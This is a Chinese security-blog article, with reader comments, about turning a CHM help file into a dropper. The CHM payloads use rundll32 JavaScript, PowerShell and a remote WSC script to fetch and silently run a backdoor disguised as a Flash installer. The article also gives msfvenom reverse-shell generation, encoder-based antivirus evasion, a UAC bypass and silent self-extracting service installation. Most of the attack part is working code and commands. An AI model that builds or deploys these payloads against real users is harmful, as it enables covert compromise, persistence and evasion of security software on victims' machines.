*本文原创作者:ruo ,本文属FreeBuf原创奖励计划,未经许可禁止转载。
序
某日嶽兄激动的说他的chm自动反弹shell做好了,急匆匆的拿我们测试,结果…一定是出bug了,我看了下演示(对不起,我实在编不下去了)。文章给出最终版代码,测试的心酸撸主右手可以作证。
第一章 CHM社工
当ithurricanept在发twitter的时候估计我在东北玩泥巴,看了Demo吓得我赶紧注册了个twitter并且Follow了TA。
Demo代码应该是这样的:
<OBJECT id=xclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1height=1>
<PARAM name="Command"value="ShortCut">
<PARAM name="Button"value="Bitmap::shortcut">
<PARAM name="Item1"value=',calc.exe'>
<PARAM name="Item2"value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
打开该CHM文件即弹出计算器,之后Samratashok也推出了他的Out-CHM(使用参数HHCPath指定自己的hhc路径),使用CHM执行powershell脚本,但唯一不足就是会弹出黑框。
PS D:\nishang\Client> Import-Module.\Out-CHM.ps1
PS D:\nishang\Client> get-help Out-CHM -examples
PS D:\nishang\Client >Out-CHM-PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath " C:\ProgramFiles (x86)\HTML Help Workshop"
##反编译CHM
hh -decompile test doc.chm
##Out-CHM PAYLOAD
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/cC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden-ExecutionPolicy Bypass -NoLogo -NoProfile IEX ((New-ObjectNet.WebClient).DownloadString('http://192.168.254.1/Get-Information.ps1'));">
<PARAM name="Item2"value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
##有用链接
ithurricanept
https://twitter.com/ithurricanept/status/534993743196090368
HTML Help Workshop
http://www.microsoft.com/en-us/download/details.aspx?id=21138
nishang
https://github.com/samratashok/nishang
第二章讨厌的黑框
nishang的黑框真的很让人捉急,不知道他找到解决办法了没,但是国内聪明的Evi1cg在某个晚上突然就想到了,反正他是这么说的。
通过rundll32.exe执行js
rundll32.exejavascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
Rundll32漏洞配合JSRAT做出了近乎完美的后门,写入注册表即可实现开机启动。
注册脚本组件
regsvr32.exe /u /n /s/i:http://10.10.10.10:31337/file.sct scrobj.dll ##有用链接
evi1cg
http://evi1cg.me/archives/chm_backdoor.html
从恶意软件获得的新姿势—通过rundll32.exe执行js原理详细分析
http://bobao.360.cn/learning/detail/164.html
JSRat
https://github.com/Hood3dRob1n/JSRat-Py
第三章强大的Powershell
但是我只想用它来下载一个后门并执行,于是乎开始了各种折腾。首先测试powershell的下载执行,然后嵌入rundll32测试,最后生成CHM再测试。
##Powershell下载并执行
powershell -WindowStyle hidden -nologo -noprofile-ep bypass IEX(New-Object Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xxx/sn.exe','..\\sn.exe');&cmd/c ..\\sn.exePowershell的下载可谓是五花八门,最后我还是选择了常用的DownloadFile(),将文件下载到上层目录(当C:\没有权限时powershell就会将文件直接下载到用户当前目录下;env:\temp环境变量在低版本powershell中没有;start-process -nonewwindow ‘sn.exe’似乎不等待下载完成便会调用),并通过&符号连接命令运行下载的程序。
##嵌入rundll32
rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell-WindowStyle hidden -nologo -noprofile -ExecutionPolicy Bypass IEX (New-ObjectNet.WebClient).DownloadFile("http://139.*.*.*/sn.exe","..\\sn.exe");&cmd/c ..\\sn.exe",0,true);##生成CHM
<OBJECT id=xclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1height=1>
<PARAM name="Command"value="ShortCut">
<PARAM name="Button"value="Bitmap::shortcut">
<PARAM name="Item1"value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell-WindowStyle hidden -nologo -noprofile -ExecutionPolicy Bypass IEX (New-ObjectNet.WebClient).DownloadFile('http://192.168.0.101/flashplayer23_ha_install.exe','..\\setup.exe');&cmd/c ..\\setup.exe",0,true);'>
<PARAM name="Item2"value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
单双引号真的会把人逼疯的,在CHM中需用’代替双引号,尝试使用base64编码powershell命令,但是嵌入rundll32测试语法错误,一时无解。
##有用链接
第四章 msf后门升级
CHM做好了,下面制作后门。开始选用新版cobaltstrike的DNS上线,结果域名测试都没问题,生的的马儿就是不上线,无奈放弃。最后选择msf的reverse_tcp。
生成马儿
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcplhost=192.168.6.12 lport=80 EXITFUNC=thread -e x86/shikata_ga_nai -b '\x00' -i3 -f exe -o /tmp/bdoor.exe 生成shellcode
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp lhost=192.168.6.12 lport=80 -e x86/shikata_ga_nai -b'\x00' -i 3 -f c##免杀
OWASP-ZSC
可以生成下载执行,添加用户,创建文件等的shellcode;
听说你可以混淆代码,原来只支持javascript perl php python ruby,更别说混淆现有shellcode了;
https://github.com/zscproject/OWASP-ZSC
Veil-Evasion
使用现有payload一键生成可执行文件。有c,python,go,ruby的meterpreter反弹后门,go和python生成的可执行文件高大4M,还不如自己使用python ctypes加载shellcode,生成exe,实用价值不大。
https://www.veil-framework.com/framework/veil-evasion/
C加载shellcode
传说中的C语言执行shellcode的五种方法只能在VC6.0下通过,VS用户真的伤不起。
VC6.0
main(){
( (void(*)(void))&shellcode )();
}
VS下
话说前两天有人发了(TM后来360也杀了),别紧张,那不是我。msf后面免杀方式多样,但一般也不外乎以下几点。
1,静态文件特征免杀
msfvenom -l encoders提供了多种编码方式,x86/shikata_ga_nai仍是目前excellent。但你一定会喜欢上Unest二进制代码混淆器的。
2,行为查杀
Cobaltstrike http上线方式请求的页面有固定格式,msf对传输的数据可以异或或者加密。
3,内存查杀
其后我将其做成管理员组用户执行直接绕过UAC自动安装成服务,启动延时3分钟(主要是开机的时候可能还没网,连接不成功便会结束程序),在执行绕UAC时system(“cmd.exe /c eventvwr.exe”);时有黑框,使用CreateProcess API创建这个进程。http://www.virustotal.com扫描仅F-PROT报毒(这应该是个梗)。
使用自解压程序安装服务
话说360看到是自解压程序就杀,果然是这样的。
##自解压程序折腾之静默模式
1, 首先能想到的就是winrar,但是winrar自解压换个ico你都杀,一会儿杀一会儿不杀的尿性始终没变;
2, 只要是加UPX壳就杀;
3, IExpress 打包啥都杀;
4, 7-ZIP SFX 自解压;
5, makesfx.exe 新版真心好用,测试一会儿直接杀;
6, ZIP 2 Secure EXE 用起来满满的心累;
7, WinZip Self-Extractor 完成后必须弹框是什么意思?
8, 其他方式
最后还是选用rar的自解压,下载英文版各版本winrar,安装后复制里面的Default.SFX和rar.exe保存,使用不通的rar版本生成自解压程序。
##自解压文件制作
创建Silent.sfx静默安装配置文件,其实就是注释啦。
程序传入bypass参数绕过UAC并安装服务
Setup=wdevmtsvc.exe bypass
TempMode
Silent=1
Overwrite=2
命令行生成自解压文件
rar.exe a -r -ep1 -sfx-zSilent.sfx flashplayer23_ha_install.exe wdevmtsvc.exe我以为到这里就完了,结果…
##有用链接
Creating a Self-Extracting Setup ExecutableFile
https://msdn.microsoft.com/en-us/library/aa244282%28v=vs.60%29.aspx
makesfx
http://74.cz/en/make-sfx/index.php
Windows-Services-Application
https://github.com/ru0/Windows-Services-Application
第五章 WSC
朋友说吓了一大跳,等了半天也没见上线。再次本地测试,发现powershell被360卫士给拦截了,尼玛,这是啥时候开始的?无奈,为了过360只能抛弃powershell下载,使用wsc下载执行。
Windows Script Components (WSC),以前称为Scriplets,是一种以容易的方式开发强大的COM组件的技术。 WSC可以用任何实现了ActiveX脚本接口的脚本语言来编写,这意味着PerlScript代码单元可以封装为Windows脚本组件。
Tips:当你开始看WSC的时候可能会被它繁多的标签搞得云里雾里,你可以使用scriptwz.exe向导生成wsc文件,或者过一阵子再看。
##通过wsc启动计算器
test.wsc文件
<component>
<script language="JScript">
<![CDATA[
newActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
1.js文件
GetObject("script:C:\\test.wsc");执行js
cscript 1.js
加载远程wsc,当然你也可以将下载js代码写在CHM里面,不过使用wsc代码更简洁并且可以及时更新下载程序。
GetObject("script:http://xxx.xxx.xxx.xxx/test.wsc")##下载并执行wsc脚本
<component>
<script language="JScript">
<![CDATA[
function getFile(strURL){
varstrResult;
try{
varWinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1")
WinHttpReq.Open("GET",strURL,false);
WinHttpReq.Send();
WinHttpReq.WaitForResponse();
strResult= WinHttpReq.ResponseBody;
}
catch(objError){}
returnstrResult;
}
var s = new ActiveXObject("ADODB.Stream");
var md = newActiveXObject("WScript.Shell").SpecialFolders("MyDocuments");
md +="\\flashplayer23_ha_install.exe";
s.Mode=3;
s.Type=1;
s.Open();
try{
s.Write(getFile("http://xxx.xxx.xxx.xxx/flashplayer23_ha_install.exe"));
s.SaveToFile(md,2);
}
catch(err){}
s.Close();
try{
newActiveXObject("WScript.Shell").Run(md);
}
catch(err){}
]]>
</script>
</component>
##嵌入rundll32中
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https://xxx.xxx.xxx.xxx/test.wsc"); ##CHM PAYLOAD
<OBJECT id=xclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1height=1>
<PARAM name="Command"value="ShortCut">
<PARAMname="Button" value="Bitmap::shortcut">
<PARAM name="Item1"value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication";document.write();try{GetObject("script:https://xxx.xxx.xxx.xxx/test.wsc");}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd/c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2"value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
用我改版的makeCHM.ps1直接生成CHM文件
.\makeCHM.ps1 -FileName test.htm实际打点效果(windows/shell/reverse_tcp 连接容易失去响应)
##有用链接
Windows Script Components (WSC)
http://www.xav.com/perl/Windows/windows_script_components.html
Registering a Script Component
https://msdn.microsoft.com/en-us/library/zt97f40t%28v=vs.84%29.aspx
ru0 s github
陌
1,如何对CHM后门检测。
2,msf虽然简单易用,但是没有会话控制,很容易丢失目标,后期可以考虑自写回连shell代码。
3,对于“没给钱”的服务360卫士检测为“无需启动的程序”。
4,自解压逃不过360sd,考虑自写解压程序或者修改服务程序。
5,若有纰漏,还望指正。
*本文原创作者:ruo ,本文属FreeBuf原创奖励计划,未经许可禁止转载。
-
@ Just4Fun 仅此回应那些@所有无脑喷,请记得先把文章看清楚在喷。此文说是“乐高机器人”我难辞其咎,毕竟只是测试和改版。在此我也喷一下那些自己不愿分享,别人分享出来然后就呵呵哒我TM早就“折腾”过了,你又来献丑了的牛逼心态!我一直觉得牛逼是一种态度,而不是一种姿态,这样能让你走的更好更远,即使最后走到小黑屋。 -
明明我才是主角啊。 -
debug点赞测试 -
Nt黑产圈的朋友表示真感动~ -
依然你们这群喷子,有本事自己上阿!ruo大牛很牛逼的!(15:31发,括号里的记得删掉)
关注我们 分享每日精选文章
不容错过
- Win8是如何引导你把文件同步至美国的FB情报组2014-05-30
- 关于39美刀的八大热门在线黑客学习课程合集说明lone2017-04-05
- 点亮我的攻击地图:树莓派蜜罐节点部署实战starshine2015-11-09
- 极客DIY:如何制作一个显卡?饭团君2016-04-25
Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
0day
已有 43 条评论
厉害!~很强!
makeCHM.ps1在哪?
360还是很有用的吧
黑产圈的朋友表示真感动~
转载了又怎么样?(我可以收藏在自己的博客了吗?)
“话说前两天有人发了(TM后来360也杀了)……”你现在还不是发了,本来还想这东西能用再久一点
组合别人发的东西,再拿出了发就有点恶心了
看了文章只有呵呵
居然不感谢我帮你测了那么久
…..这个是新技术了么?
我记得以前就有过CHM挂马……
就是把CHM中的HTML挂 ……
JS那个很屌!
@ yyy3333 主要是wsc很有用
很强!
好文章,N多知识点拼接起来的利用。希望多些这种文章。
谁喷我家ruo先问问我手上的金背大砍刀!来 来 来 小伙子你过来
还有你那个杀毒检测都是很久没有更新病毒定义的病毒库,更本不准确。请用VirusTotal
@ 安小哲 是的,说以我也调侃了这是一个梗
哪有这么复杂,chm都用烂了,以前04年那时就开始用效果很好,到现在还有两个chm的0day可用,chm被很多邮件网关都封了,现在只能当成一种情怀。
07年入门就写过CHM捆马工具…回想起来差不多10年了 在那个QQ直接发EXE就能随便黑人的2B年代 Chm发给黑客都中招 简直感觉要上天了。(就好像别人非要用枪才能杀一般人,而你只用一把刀却做到连有枪的杀手都随便杀)PS: 当时很多教程资料都是CHM
@ K8-拉登哥哥 是的,相比被用烂了的CHM这篇文章就显得很狗B了,但是我们最在乎的是效果,不是么?
@ ruo 这里说效果的话可能你不是很清楚玩了好多年人对chm的印象 楼上上的说的很对 当年很多人都玩过chm绑脚本绑马 当年的确是挺火的东西 甚至一些战斗在前线的人员都用过 当然现在不适用了~都防了..
@ 擦 哈哈哈,作为***的人,我觉得还是聊facebook来的快
@ 擦 哈哈哈,这个我们可以深入交流下
说实话。我开着360.第一次,直接把chm文件卡死了。第二次直接秒删,第三次直接打不开了 后面内容都来不及触发,就已经死机了
测一下,那个是自解压过uac? 我弱爆了
@ Just4Fun 仅此回应那些@所有无脑喷,请记得先把文章看清楚在喷。此文说是“乐高机器人”我难辞其咎,毕竟只是测试和改版。在此我也喷一下那些自己不愿分享,别人分享出来然后就呵呵哒我TM早就“折腾”过了,你又来献丑了的牛逼心态!我一直觉得牛逼是一种态度,而不是一种姿态,这样能让你走的更好更远,即使最后走到小黑屋。
表示曝光的很多工具和手段都在老早以前就玩过了[doge]
这不是乌云很久之前的文章嘛,组合了一下。。。。
看到前面有喷子,我想说you can you do,no can no bb,本身只是一个分享技术的过程,你能组合起来你也上啊
3,对于“没给钱”的服务360卫士检测为“无需启动的程序”。
无脑黑啊
@ diigu 3,对于“没给钱”的服务360卫士检测为“无需启动的程序”。
无脑黑啊,说话需注意。
评论了这么多,这么多喷子,无脑黑到亲妈爆炸啊这是,说得像是你会chm这个似的,明显的嫉妒心理,自己搞不出来就去喷别人,黑粉就是黑粉,笑笑不说话.要是不服你去写一个发出来呀?
为啥每回文章都有人喷,抱着学习的心态把文章看完难道不好么。
看完默默的走,喷什么。
2016-11-18 12:39
若:帮我去freebuf黑那群喷子!
@ fate 我跟你说,你这样会被日的
你们这群喷子,有本事自己上阿!ruo大牛很牛逼的!(15:31发,括号里的记得删掉)
明明我才是主角啊。
点赞测试
3,对于“没给钱”的服务360卫士检测为“无需启动的程序”。
给够钱就给你加白我会乱说?
五年前,日本狗就开始利用chm漏洞了,当你们点击xxx女优.chm的时候
楼主这不怕被360杀掉吧,我开了360第一次秒删,第二次秒杀,第三次文件无效。
@ zusheng 不好意思,我不是很明白您的意思
围观 顺带做个标记